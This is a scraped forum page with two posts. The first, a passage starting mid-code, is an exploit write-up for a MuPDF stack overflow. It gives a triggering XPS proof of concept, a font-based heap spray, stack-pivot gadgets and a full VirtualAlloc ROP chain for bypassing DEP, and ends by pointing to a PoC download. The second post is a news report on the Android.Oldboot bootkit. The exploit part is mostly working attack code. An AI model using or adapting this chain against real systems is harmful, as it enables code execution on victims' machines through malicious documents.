'); if (!p) { fz_warn(doc->ctx, "cannot find component values in '%s'", profile); return; } *p++ = 0; n = count_commas(p) + 1; i = 0; while (i < n) { samples[i++] = fz_atof(p); p = strchr(p, ','); if (!p) break; p ++; if (*p == ' ') p ++; } } …………. } This is the assembly code from the compiled C code above : .text:0047C590 loc_47C590: .text:0047C590 push esi ; char * .text:0047C591 call fz_atof // convert into float .text:0047C596 fstp dword ptr [edi+ebx*4] .text:0047C599 add esp, 4 .text:0047C59C push 2Ch ; int .text:0047C59E push esi ; char * .text:0047C59F add ebx, 1 .text:0047C5A2 call _strchr // search next comma .text:0047C5A7 mov esi, eax .text:0047C5A9 add esp, 8 .text:0047C5AC test esi, esi // check if the returned pointer is null .text:0047C5AE jz short loc_47C5C1 .text:0047C5B0 add esi, 1 .text:0047C5B3 cmp byte ptr [esi], 20h // trim potential space .text:0047C5B6 jnz short loc_47C5BB .text:0047C5B8 add esi, 1 .text:0047C5BB .text:0047C5BB loc_47C5BB: .text:0047C5BB cmp ebx, ebp // check only the number of comma (oops… no test for the samples size) .text:0047C5BD jl short loc_47C590 This is an example of a proof-of-concept test case that triggers the overflow : <FixedPage Width="793.76" Height="1122.56" xmlns="<a href="http://schemas.microsoft.com/xps/2005/06">http://schemas.microsoft.com/xps/2005/06</a>" xml:lang="und"> <Path Data="" Fill="ContextColor 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47" /> </FixedPage> We need to write our shellcode into the heap, so maybe we could put a stack pivot to return at the beginning of the stack buffer, process the ROP chain and then do an egg hunter to execute the shellcode from the heap but there is a much nicer solution. It's possible to trigger multiple aligned allocations into the heap, even if we can't use javascript scripting routine. I used the "font" attribute to allocate binary data, controlling the size for each of them else it's not possible to make precise allocations. So we can now put the ROP and shellcode directly at 0x0c0c0c0c. If we take a look at the assembly code, the functions displayed below are used to do most of the allocations of elements and resources : .text:00421BCC loc_421BCC: .text:00421BCC mov edi, [esp+18h] .text:00421BD0 mov eax, [esi+44h] .text:00421BD3 call sub_40F730 .text:00421BD8 mov edi, [esp+1Ch] .text:00421BDC lea ebx, [edi+1] // ebx = 0x100000 (1mo) .text:00421BDF test ebx, ebx // check the size .text:00421BE1 mov [ebp+0], eax .text:00421BE4 mov [ebp+4], edi .text:00421BE7 mov esi, [esi+44h] .text:00421BEA jnz short loc_421BFD .text:00421BEC xor eax, eax .text:00421BEE .text:00421BEE loc_421BEE: ; CODE XREF: .text:00421C06_j ……. .text:00421BFD .text:00421BFD loc_421BFD: ; CODE XREF: .text:00421BEA_j .text:00421BFD mov eax, esi .text:00421BFF call do_scavenging_malloc // go malloc .text:00421C04 test eax, eax .text:00421C06 jnz short loc_421BEE .text:00421C08 push ebx .text:00421C09 push offset aMallocOfDBytes ; "malloc of %d bytes failed" .text:00421C0E lea ecx, [eax+1] .text:00421C11 call sub_40FAD0 No particular check is made except if the size is null or zero. Obviously, if it's zero, the function returns null. ebx contains the size of our block (0x100000). .text:0040F450 do_scavenging_malloc proc near .text:0040F450 push ecx .text:0040F451 push esi … .text:0040F470 .text:0040F470 loc_40F470: .text:0040F470 mov eax, [esi] .text:0040F472 mov ecx, [eax] .text:0040F474 mov edx, [eax+4] // & _sub_40F7A0() .text:0040F477 push ebx // size = 0x100000 .text:0040F478 push ecx .text:0040F479 call edx // call _sub_40F7A0() As we can see, __cdecl sub_40F7A0 is dynamically resolved and then called with the size argument filled in ebx before. .text:0040F7A0 ; int __cdecl sub_40F7A0(int, size_t) .text:0040F7A0 .text:0040F7A0 mov eax, [esp+arg_4] .text:0040F7A4 push eax ; size_t .text:0040F7A5 call _malloc // do HeapAlloc() of our font size .text:0040F7AA add esp, 4 .text:0040F7AD retn .text:0040F7AD sub_40F7A0 endp Finally, our font allocations are done and will remain without being freed. Practically, we need to generate many font files containing our binary data into a folder and write the path of each of them into the page file using FontUri attribute of Glyphs like shown below to load them. <FixedPage Width="793.76" Height="1122.56" xmlns="<a href="http://schemas.microsoft.com/xps/2005/06">http://schemas.microsoft.com/xps/2005/06</a>" xml:lang="und"> <Glyphs OriginX="96" OriginY="96" UnicodeString="This is Page 1!" FontUri="/Documents/1/Resources/Fonts/FONT-0.ttf" FontRenderingEmSize="16"/> <Glyphs OriginX="96" OriginY="96" UnicodeString="This is Page 1!" FontUri="/Documents/1/Resources/Fonts/FONT-1.ttf" FontRenderingEmSize="16"/> <Glyphs OriginX="96" OriginY="96" UnicodeString="This is Page 1!" FontUri="/Documents/1/Resources/Fonts/FONT-2.ttf" FontRenderingEmSize="16"/> … <Path Data="" Fill="ContextColor 5.962129799535157e-039,7.421697056603529e-039,7.334452214214666e-039, … /> </FixedPage> It now only remains to find a solution to bypass DEP. ASLR can be bypassed in this case because mupdf.exe isn't ASLR compiled. A stack pivot will allow executing the ROP from the heap 0x005000a7 : # XOR EAX,EAX # POP ESI # RETN 0x0C0C0C0C : 0x0C0C0C0C 0x00453eaa : # ADD EAX,ESI # POP ESI # POP ECX # RETN 0x0C0C0C0C : 0x0C0C0C0C 0x0C0C0C0C : 0x0C0C0C0C 0x0047033d : # XCHG EAX,ESP # POP EBP # POP ESI # POP EBX # RETN The ROP chain is based on mupdf.exe (which is non-ASLR). In this case, it appears that only VirtualAlloc is necessary to bypass DEP. 0x0040ebfe, # POP EAX # RETN 0x0050d0ac, # ptr to &VirtualAlloc() 0x004fdd78, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # RETN 0x41414141, # Filler (compensate) 0x00408e96, # XCHG EAX,ESI # RETN 0x004baf26, # POP EBP # RETN 0x0046521a, # & call esp 0x00421d9e, # POP EBX # RETN 0x00000001, # 0x00000001 0x004fff88, # POP EDX # RETN 0x00001000, # 0x00001000 0x0048ab04, # POP ECX # RETN 0x00000040, # 0x00000040 0x00472066, # POP EDI # RETN 0x00500681, # RETN (ROP NOP) 0x0050be74, # POP EAX # RETN 0x90909090, # NOP 0x004d99ac, # PUSHAD # RETN Conclusion The MuPDF library is vulnerable to a stack overflow and could be exploited in this case because of two conditions : the binary is non-aslr compiled allowing us to easily get a ROP chain and bypass DEP protection. it was compiled with /GS, maybe with an old version of Visual Studio which doesn't protect arrays of floats with stack cookies. Source : HDW Sec Exploit DB Download the PoC
    1 point
  6. net3design
    A new trojan for Android has been discovered that resides in the memory of infected devices and launches itself early on in the OS loading stage. Even if some elements of the threat are removed successfully, at least one component will still reside in the protected memory area and will reinstall the malware after a reboot and, thus, re-infect the system. The threat, detected as “Android.Oldboot.1” by Russian security firm Doctor Web, is believed to be the first bootkit for Android according to the company. A bootkit, for those who don’t know, is a kernel-mode rootkit variant that can infect startup code in order to attack even attack full disk encryption systems as well as minimize the possibility that it will be deleted without tampering with the device’s file system. The malware has reportedly been detected on more than 350,000 mobile devices around the world, including Spain, Italy, Germany, Russia, Brazil, the US and some Southeast Asian countries. 92 percent of the compromised devices are, however, located in China: This is key to understanding that this threat doesn’t spread by simply browsing the Web, opening attachments, or even sideloading suspicious apps. The malware either ships with the device in question or is manually deployed by someone with physical access to an Android phone or tablet. Doctor Web explains a device is first infected by placing one of trojan’s components into the boot partition of the file system and by modifying the init script responsible for the initialisation of OS components. When the device is turned on, the modified script loads the code responsible for the trojan’s Linux-library imei_chk, which extracts the files libgooglekernel.so and GoogleKernel.apk, placing them in /system/lib and /system/app, respectively. Thus, part of the Trojan Android.Oldboot is installed as a typical application which further functions as a system service and uses the libgooglekernel.so library to connect to a remote server and receive various commands, most notably, to download, install or remove certain applications. Reflashing a device with modified firmware that contains the routines required for the trojan’s operation is the most likely way this threat is introduced, according to Doctor Web. The good news is that your device is unlikely to be infected with Android.Oldboot.1 unless you have purchased a dubious product from a Chinese manufacturer. On the flipside, this sets a dangerous precedent for Android malware that is very difficult to remove. Source : The Next Web RST Forums - Nytro 360 CN Blog
    1 point
×
×
  • Create New...